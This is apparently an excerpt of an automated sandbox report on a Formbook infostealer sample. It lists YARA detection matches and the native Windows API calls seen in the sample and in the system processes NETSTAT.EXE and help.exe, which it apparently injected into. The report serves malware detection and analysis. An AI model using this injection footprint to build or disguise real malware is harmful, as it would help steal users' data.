          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_0041A050 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00419F20 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00419FD0 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_0041A04A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00419F74 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00419F1A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00419FCB NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A0A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_0041A050 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00419F20 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00419FD0 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_0041A04A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00419F74 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00419F1A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00419FCB NtReadFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_0041A050 NtClose,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00419F20 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00419FD0 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_0041A04A NtClose,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00419F74 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00419F1A NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00419FCB NtReadFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A5B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A599D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59A10 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A5A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A595F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A5AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59560 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A596D0 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A5A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59760 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A59770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02DC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_0236A050 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_0236A100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02369F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02369FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_0236A04A NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02369F1A NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02369F74 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 17_2_02369FCB NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9A50 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C99A0 NtCreateSection,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9840 NtDelayExecution,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9710 NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9780 NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9540 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_036C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_00E8A050 NtClose,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_00E8A100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_00E89FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_00E89F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_00E8A04A NtClose,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_00E89FCB NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_00E89F74 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 23_2_00E89F1A NtCreateFile,
